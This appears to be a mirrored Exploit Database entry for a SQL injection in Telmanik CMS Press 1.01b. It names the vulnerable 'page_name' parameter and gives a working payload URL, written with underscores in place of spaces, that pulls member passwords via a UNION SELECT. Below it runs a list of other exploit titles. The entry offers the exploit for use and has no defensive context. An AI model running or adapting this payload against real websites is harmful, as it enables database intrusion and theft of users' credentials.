Telmanik CMS Press 1.01b – ‘pages.php?page_name’ SQL Injection

Exploit Database
33 阅读

作者： Anarchy Angel

日期： 2013-08-02
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/27281/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: SQL Injection
[x] Vendor: www.telmanik.com
[x] Script Name: Telmanik CMS Press
[x] Script Version: 1.01b
[x] Script DL:
http://www.telmanik.com/download/Telmanik_CMS_Press/1.01_beta/telmanik_cms_press_v1.01_beta.zip
[x] Author: Anarchy Angel
[x] Mail : anarchy[at]dc414[dot]org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit:

http://site.org/themes/pages.php?page_name=[SQLi]

you have to formate you injection like so:
union_select_row_from_table
Replacing spaces with �_�.

Ex:

http://site.org/themes/pages.php?page_name=union_select_password_from_members

This is a special DefCon 21 kick off from me! See ya there [image: ;)]

Special Tnx : dc414, lun0s, proge, sToRm, progenic, gny

last Exploits
Telmanik CMS Press 1.01b – ‘pages.php?page_name’ SQL Injection的更多信息

AR Web Content Manager (AWCM) – ‘cookie_gen.php’ Arbitrary Cookie Generation：
PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection：
PHP Timeclock 1.04 – ‘Multiple’ Cross Site Scripting (XSS)：
CMScout 2.08 – Cross-Site Scripting：
Spreecommerce 0.60.1 – Arbitrary Command Execution (Metasploit)：
WordPress Plugin CopySafe Web Protect < 2.6 - Cross-Site Request Forgery：
CobraScripts Trading Marketplace Script – ‘cid’ SQL Injection：
CodoForum 3.3.1 – Multiple SQL Injections：